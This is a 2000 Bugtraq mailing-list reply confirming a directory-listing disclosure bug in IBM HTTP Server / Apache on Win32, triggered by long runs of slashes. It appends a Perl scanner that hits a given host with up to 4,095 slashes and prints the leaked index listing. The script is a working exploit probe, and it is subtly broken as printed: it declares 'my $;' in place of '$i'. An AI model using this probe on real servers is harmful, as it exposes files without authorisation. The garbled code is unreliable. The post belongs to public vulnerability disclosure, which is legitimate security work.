[15148] in bugtraq
Re: IBM HTTP SERVER / APACHE
daemon@ATHENA.MIT.EDU (H D Moore)
Thu Jun 1 21:05:20 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <393678B6.ACE4029@secureaustin.com>
Date: Thu, 1 Jun 2000 09:52:38 -0500
Reply-To: H D Moore <hdm@SECUREAUSTIN.COM>
From: H D Moore <hdm@SECUREAUSTIN.COM>
X-To: Marek Roy <marek_roy@HOTMAIL.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Hi,
I verified this on IBM_HTTP_SERVER/1.3.3 Apache/1.3.4-dev (Win32). The
number of /'s needed were exactly the same number as Marek stated in his
original email (211 being the key number to retrieve an index listing).
Appended is an example perl script for finding _your_ magic number. Is
this a bug merely in IBM HTTPD or Apache Win32 in general? Does IBM set
some odd compile flag which triggers this bug in thier version? Anyone
from the Apache group care to comment?
-HD
http://www.secureaustin.com (spidermap/nlog/etc)
Marek Roy wrote:
>
> I haven't seen any advisories for IBM HTTP SERVER running
> Apache.
>
[ snip ]
> The number of "/" used to reproduce this can be different
> from one server to another. I don't have enough time to do
> more testing. However, feel free to add some more info to
> this quick advisory.
----[ sample scan script to find / offset ]---- (OMG its PERL ;)
#!/usr/bin/perl
use LWP::Simple;
use strict;
my $host = shift() || die "usage: $ARGV[0] [hostname]";
my $cnt;
my $data;
my $odata;
my $;
$odata = get("http://$host/");
if ($odata eq "")
{
die "no response from server: $host\n";
}
for ($i = 2; $i < 4096; $i++)
{
print "Trying $i...\n";
$data = get("http://$host" . ("/" x $i));
if ($data ne $odata)
{
print "/ = $i\n\n$data\n\n";
exit;
}
}
